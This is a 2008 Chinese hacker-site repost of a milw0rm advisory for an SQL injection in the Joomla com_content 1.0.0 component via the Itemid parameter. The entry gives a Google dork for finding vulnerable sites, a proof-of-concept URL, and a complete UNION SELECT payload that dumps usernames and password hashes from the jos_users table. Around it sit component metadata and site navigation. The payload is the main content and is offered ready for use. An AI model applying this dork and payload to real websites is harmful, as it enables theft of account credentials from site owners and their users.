Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> 漏洞 >> web apps >> 正文

用户登录

新用户注册

Joomla SQL注入vuln

★★★

【字体：小大】

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

作者：milw0rm 文章来源：milw0rm 点击数：更新时间：2008-7-10

-------------------------------------------------------------------------------------------

   Joomla Component com_content SQL Injection Vulnerabity

-------------------------------------------------------------------------------------------

Author    : unknown_styler

Dork      : inurl:com_content

POC        : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

Example    : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*

------------------------------------------------------------------------------------------------------------------------------------

                                         Greetings : h4ck-y0u.org

side note:

<name>Página de contenido</name>
<author>Projecte Joomla!</author>
<creationDate>July 2004</creationDate>
<copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>1.0.0</version>

# milw0rm.com

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇漏洞：脚本远程SQL注入漏洞

下一篇漏洞：多个远程文件包含漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913